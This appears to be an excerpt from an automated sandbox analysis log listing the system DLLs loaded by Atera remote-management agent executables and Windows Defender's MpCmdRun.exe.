                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptnet.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: webio.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: apphelp.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: napinsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: pnrpnsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wshbth.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: nlaapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winrnr.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: napinsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: pnrpnsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wshbth.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: nlaapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winrnr.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: propsys.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: edputil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: urlmon.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iertutil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wintypes.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: appresolver.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: bcp47langs.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: slc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sppc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptnet.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: napinsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: pnrpnsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wshbth.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: nlaapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winrnr.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wscapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: urlmon.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: iertutil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc6.dll
